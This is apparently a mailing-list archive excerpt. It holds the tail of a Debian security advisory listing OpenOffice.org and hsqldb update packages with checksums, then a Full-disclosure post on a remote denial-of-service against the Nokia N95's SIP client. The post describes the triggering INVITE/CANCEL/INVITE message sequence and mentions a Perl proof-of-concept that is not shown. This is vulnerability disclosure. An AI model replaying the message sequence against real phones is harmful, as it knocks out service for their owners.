    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-lt_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   873830 6a0917094999e87d9530422a4fc87912
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-lv_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   869044 8570ef7fa0e7023d8ba0daa6374a6b92
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-mk_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   918048 bdbce5c67e2ac4ce0b62ada0cc1e0088
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ml-in_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   924368 2bf0964303a5eb59a912af62ea001c3d
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-nb_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   848612 77a6893c8d75f0887f34f4b6d10d7ed7
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ne_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   922324 ccc6bd5d6c54d1340d449367b0351e2b
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-nl_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  2033598 18b83cee27d761d42903d864c97fe8b4
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-nn_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   853804 2b7a1c7cfff8253965040297dc4d271e
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-nr_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   886046 c18022d64b7fb17754dec96135c3e62b
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ns_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   877630 f2a855a6e31d4edbb0df404efc2f8856
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-or-in_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   917182 2d91802fd3749ae1f394bd11fbb2d58b
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-pa-in_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   900932 92ec15180a2ec802377002ac472f95cd
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-pl_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  2004168 569f002009b66e7eb41b8051952f2bb4
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-pt-br_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  1967002 35315d1883e54937f45fcaf8dbd9ee9c
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-pt_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  1050364 a2d2fb9bf7e9a04f8d033155c445f685
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ru_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  2025374 f5e88b6a52bac208f039ab86eb40bb02
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-rw_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   864112 f407c49b8dea62f5c224749aaf449f25
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-sk_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  2051554 a132fa8a4d30bf4520f60664356554c8
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-sl_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  2040914 bf466f18df963edbc0a47572cbb1e861
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-sr-cs_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   912082 3e4ae170b64bc00dd64602a312bdf0ff
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ss_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   878378 2b2c40228cdab76e79923f203c8a1945
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-st_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   877500 32f2e3b31d9c66584808daa51f6e23c0
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-sv_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  1957510 080a3e94ed7f715e847c6dc8ebc97583
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ta-in_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   908996 d8236242495ec1f3f6fba2c92cdd6940
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-te-in_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   929216 f7fe52a6eb1095d0c4e4f19c4c73097c
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-tg_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   903282 9fe9ce379cda647562e250cc8f84f9e4
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-th_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   930936 f11e1158b9746bc9204963136bf2183a
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-tn_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   822478 de9018e439f6b8ffc38f47f9d85e2e2f
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-tr_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  1384632 b51cdd2ea33d27fa8a593a24cb3da8e1
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ts_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   877288 80ed4715e63b2a9524705f959d76065d
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-uk_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   916018 10e6cb394a1154e7c6595d9695efa95c
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ve_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   886306 cf7d777290ecad5732579616fc14e730
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-vi_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   870352 2d3af98bca376db6eab316f9b64729d4
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-xh_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   897900 2fed475a5881ef2d554d10605e7d8842
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-za_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   213376 fb70f85d7cf72bbdd69d2e62800d2164
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-zh-cn_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  2107224 8560b0bc6e8447d0ba5ef7642ccb08d4
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-zh-tw_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  2103298 16b045acd26446e538fac37973e55c2a
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-zu_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   886902 cc58756fe28abef69fae491f88c6bec1
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-qa-api-tests_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  2455186 06df67d1d41d23bed8400f25153b0685
    http://security.debian.org/pool/updates/main/o/openoffice.org/ttf-opensymbol_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   285222 d85b42c664fe424e183476a0e5c329a4

    http://security.debian.org/pool/updates/main/h/hsqldb/hsqldb-server_1.8.0.7-1etch1_all.deb
      Size/MD5 checksum:    40270 995273c292357f5d8cdd385484765fa9
    http://security.debian.org/pool/updates/main/h/hsqldb/libhsqldb-java-doc_1.8.0.7-1etch1_all.deb
      Size/MD5 checksum:   860770 cc96a30a2876e64e4368d1ada49ab914
    http://security.debian.org/pool/updates/main/h/hsqldb/libhsqldb-java_1.8.0.7-1etch1_all.deb
      Size/MD5 checksum:   852586 0154566048078ba8e6d2f70cead1ab23

  Alpha architecture:

    http://security.debian.org/pool/updates/main/o/openoffice.org/libmythes-dev_2.0.4.dfsg.2-7etch4_alpha.deb
      Size/MD5 checksum:   107120 8e963ff20a4ebdaf16c8357a139dfd33

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/o/openoffice.org/libmythes-dev_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:   104620 9a5c533b5c83f7afd2e8452275597f03
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:   215524 c316b13b8093d4be1709d0a7563ff326
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-base_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:  3815418 048aeb9d8076ecc2bafafd2d9a6b1ace
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-calc_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:  5409744 0ce5e4ed8bfbae2892d40f2fd6db53db
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-core_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum: 35708204 689cc403fd954bcd0f0b780edd05e875
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-dbg_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum: 38172254 9202f9979e5f7f517de7446c78aa0d69
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-dev_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:  3756140 d81cc877dc57dea9dbbf99f4e26cb35f
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-draw_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:  2544632 5a66877fcc8b1c1a35d32dcc4e42b4fc
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-evolution_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:   308014 4adc2bb6bcc486ce1dead88cce92e7ba
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-filter-so52_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:  9781700 8e54db5c1916d738fc1046a18fd180be
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-gcj_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:  5347166 bd0c7a4ebf1f4efe4b132ed0cf8356c7
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-gnome_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:   295812 e747a57bd3fd5d8eb71b859ab6815207
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-gtk_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:   403068 3b6e9ba610479a745ce37d9224f1789b
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-gtk-gnome_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:   213286 afad9de73ac77527f223a12bc163c7be
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-impress_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:   857034 8ee9a694032492097fe99855b2225e62
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-kde_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:   447840 caf0c4f5244f49761cd00277109b88b1
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-math_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:   538226 26eb83a48205c742071e6df4a66449ca
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-officebean_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:   252906 e04136219980490604a90e185814cd20
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-qa-tools_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:   826792 8aaf2bac665edcc4c653ff70e8a897a4
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-writer_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:  6270762 e349bb9f9326b143143277a802160830
    http://security.debian.org/pool/updates/main/o/openoffice.org/python-uno_2.0.4.dfsg.2-7etch4_amd64.deb
      Size/MD5 checksum:   362068 de5856f7704f13569748e53eae326cde

  ARM architecture:

    http://security.debian.org/pool/updates/main/o/openoffice.org/libmythes-dev_2.0.4.dfsg.2-7etch4_arm.deb
      Size/MD5 checksum:   104896 3bf02c95a3df4c1811eb0217ae8ee4fb

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/o/openoffice.org/libmythes-dev_2.0.4.dfsg.2-7etch4_hppa.deb
      Size/MD5 checksum:   106394 12cb2296eef63d1f8b0cfd83bfd1ced7

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/o/openoffice.org/libmythes-dev_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:   105182 1ddf8c46c0e2dcffc71be30bd719879f
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:   215726 0f25501a3d5cd4c7bbb0a355a2181ac7
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-base_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:  3715390 8461efd0bc91658387a5f7856d223388
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-calc_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:  5155652 14033d97d152458e93547f5914b6aa8f
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-core_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum: 34477922 7470c10531c8ec4c88046bfde6b95845
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-dbg_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum: 36358556 a0df28d56bf5c0e9e7b4333dacdd6768
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-dev_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:  3721614 63688677d299657c8cc2021bc8389925
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-draw_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:  2484830 13d1eac99916b2d844e595a0e3b87a98
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-evolution_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:   302426 cb03d9a7e97c0b0ef8523cb77daa2d0c
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-filter-so52_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:  9302166 89b88d17781b2e38b4bd741b4c4255a3
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-gcj_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:  4368822 d9825cbf765438345cf1f435295fe944
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-gnome_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:   291608 91fe68b9a5fc91874defd06adc2d2efe
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-gtk_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:   398090 b089e081ebb4712c398bc65abdf8c396
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-gtk-gnome_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:   213486 f58ac6b0cded95c1a0b72ade20daafa4
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-impress_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:   851702 b95546cfe2c48e3549361b35b958836d
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-kde_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:   434734 fe72e98aa560a9aaddba588ec4b97639
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-math_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:   522892 db0f48ad21f44a263eb6992552e699f6
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-officebean_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:   252860 6188b2d905a558461de8790e9d1c73cf
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-qa-tools_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:   824778 7c5abbd7d7618769235c9355d81a4ac3
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-writer_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:  6095718 a38d9cf2fa865398df1ec22bf1058fdc
    http://security.debian.org/pool/updates/main/o/openoffice.org/python-uno_2.0.4.dfsg.2-7etch4_i386.deb
      Size/MD5 checksum:   357740 ec14129f1534b799a3772508f6008d41

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/o/openoffice.org/libmythes-dev_2.0.4.dfsg.2-7etch4_ia64.deb
      Size/MD5 checksum:   105170 ee22bf781f152dc758c7ab13938d5426

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/o/openoffice.org/libmythes-dev_2.0.4.dfsg.2-7etch4_mips.deb
      Size/MD5 checksum:   103672 730d85d75c3cf6c5d4c4ee51e65c6177

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/o/openoffice.org/libmythes-dev_2.0.4.dfsg.2-7etch4_mipsel.deb
      Size/MD5 checksum:   103736 305e8d3184d1846fa7b87c4fba86ddb1

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/o/openoffice.org/libmythes-dev_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:   105290 720b503b4c18d44193088aa6fcb30882
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:   217202 d1e8f29b984d4b464d589bb874feab4d
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-base_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:  3891380 6eec53a6433092f7b4d88428dd565bf9
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-calc_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:  5291346 fa421b9fb4c5f267770d310d7fed79ec
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-core_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum: 35847732 7f42d5e557888be5f18dfc70e6c34e4a
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-dbg_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum: 38479248 9b232580e7b7144f8245bab3f0b3c20e
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-dev_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:  3768904 e52a0114fed077ffd3863c3e1727f6a8
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-draw_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:  2488740 f2378122ff4682ecd65a102de07ec0a5
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-evolution_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:   314066 319e94223675e0ee678ecc7ba2ccb479
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-filter-so52_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:  9649486 7984c9cb03d37b38b9354b799abacf58
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-gcj_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:  5056194 eb15a54b5624a34dc487b918cb0fe2ae
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-gnome_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:   300964 ced011f9b90b87bd610a73549f44a481
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-gtk_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:   408176 26a2629e57fc783291cd628b8f4c55aa
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-gtk-gnome_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:   215024 8535571057b28a04c2a46841c72bd88d
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-impress_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:   889280 841950ee58aeeb66f52d6a6eddf62fc1
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-kde_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:   450640 6a44ddc61abb45224c0374e462d4209e
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-math_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:   519326 54cf2c5b8fe224afcd562bbd97f009bf
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-officebean_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:   254060 0b473a2730822a13ce4c418f52833e19
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-qa-tools_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:   822412 dce45e844a08f27c42a1ea12dc8a5ce4
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-writer_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:  6078974 b090dc1e0081844f2c7a0ac70ef92f08
    http://security.debian.org/pool/updates/main/o/openoffice.org/python-uno_2.0.4.dfsg.2-7etch4_powerpc.deb
      Size/MD5 checksum:   367368 892e32e1e237d315fb78bff156e9f151

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/o/openoffice.org/libmythes-dev_2.0.4.dfsg.2-7etch4_s390.deb
      Size/MD5 checksum:   105540 808741d0631085491098fe35abc5265b

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/o/openoffice.org/libmythes-dev_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:   103594 2e4af5329f2778242e7f1289a1197164
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:   217062 602d95659af8d9a2f9d9a4c6393ffb82
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-base_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:  3919062 d21f72f97bf94e4be09f0386f2184b87
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-calc_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:  5323302 702e9a904accc28d00225e5f0931c0ec
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-core_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum: 35489734 75ae01e0810642586a458caed9d8d4b2
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-dbg_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum: 36153486 68c65757906b4263af8724a2420e8654
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-dev_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:  3604330 e5c2d3e9ea6daeca3414bbc6cbdce6de
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-draw_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:  2502484 25aa590e331f65de9a46e2331ec47017
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-evolution_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:   314610 4eaf4624ad7aa55704314027ea723e0a
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-filter-so52_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:  9659576 94889f34a87ba7fb834e77029a3c3563
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-gcj_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:  4854098 a0ed03043ede2d8f1c591673380f3991
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-gnome_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:   293410 e4cae4dc525169c611fb64d4a516f2a5
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-gtk_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:   395014 26fdb2281fe63f73cd80fff37cd0c9a9
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-gtk-gnome_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:   214818 ac9519b13e5e7bd272781343b1e4ba03
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-impress_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:   955204 f8482150d08ce22592f8009be1488f94
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-kde_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:   448358 37d09cb3a8a3758f8eeb6afe4c0b77a0
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-math_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:   509944 dcfa1dfef2dc0c667323a0716446f13a
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-officebean_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:   252026 113d0a50cf8874d732b716f127c7635c
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-qa-tools_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:   803948 d95f314810ee4d60904c1babdd5709e4
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-writer_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:  6007848 483539c0c19659df2ef8a8bef7972dd7
    http://security.debian.org/pool/updates/main/o/openoffice.org/python-uno_2.0.4.dfsg.2-7etch4_sparc.deb
      Size/MD5 checksum:   365466 016e78926dd07c2c442d817fa1c02a35


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHVsGOW5ql+IAeqTIRAgf6AJ0WAp7SVwEvDZgl99qAnfGIyfIrqACgkAB1
Iwqa2RDw2C/35Hio77fsV6U=
=q9Jv
-----END PGP SIGNATURE-----



From State at loria.fr  Wed Dec  5 17:05:04 2007
From: State at loria.fr (Radu State)
Date: Wed, 5 Dec 2007 18:05:04 +0100
Subject: [Full-disclosure] Nokia N95 cellphone remote DoS using the SIP Stack
Message-ID: <003c01c83760$faac19b0$5e0c5198@Crocodile>

Nokia N95 cellphone remote DoS using the SIP Stack

 

Severity:

High ? Denial of Service

 

Hardware:

Nokia N95

 

Firmware:

Tested version: Nokia RM-159 V 12.0.013

 

Notification:

Vulnerability found: 11 September 2007

Contact Nokia Support: 12 September 2007 / None reply Contact Nokia Security
Support: 19 September 2007 / None reply

 

Vulnerability Synopsis:

If the device has the SIP Phone client activated, a sequence of SIP messages
turn the device in an inconsistent state where the user is not able to
operate it anymore until it reboots.

 

The sequence of messages consists in 2 different SIP Dialogs where the first
initiates an INVITE transaction but immediately closes it (in an anticipated
manner). While, the second transaction initiates a normal INVITE transaction
that trigger the vulnerability of the target.

 

The sequence of messages is illustrated below.

 

X ------------------------- INVITE -----------------------> Nokiav12

X <---------------------- 100 Trying ---------------------- Nokiav12 

X ------------------------- CANCEL -----------------------> Nokiav12 

X <----------------- OK (to the Cancel) ------------------- Nokiav12

 X <---------------- 487 Request Terminated ---------------- Nokiav12

 

--------New Dialog--------

 

X ------------------------- INVITE -----------------------> Nokiav12

X <---------------------- 100 Trying ---------------------- Nokiav12

X <---------------------- 180 Trying ---------------------- Nokiav12

 

---- The device does not work properly anymore ----

 

Impact:

A remote entity can take down all the services of the cell phone

 

Resolution:

As we did not get any proper reply from Nokia about the subject, the best
way will be to disable the SIP Client

 

Credits:

Humberto J. Abdelnur (Ph.D Student)

Radu State (Ph.D)

Olivier Festor (Ph.D)

 

This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using KiF the Madynes VoIP fuzzer.

HYPERLINK "http://madynes.loria.fr/"http://madynes.loria.fr/

 

 

Proof of Concept:

 

A perl script (nokiav12.pl) is attached to this mail. Before launching 

it, the SIP phone has to be initialed in the target device

 

Command:

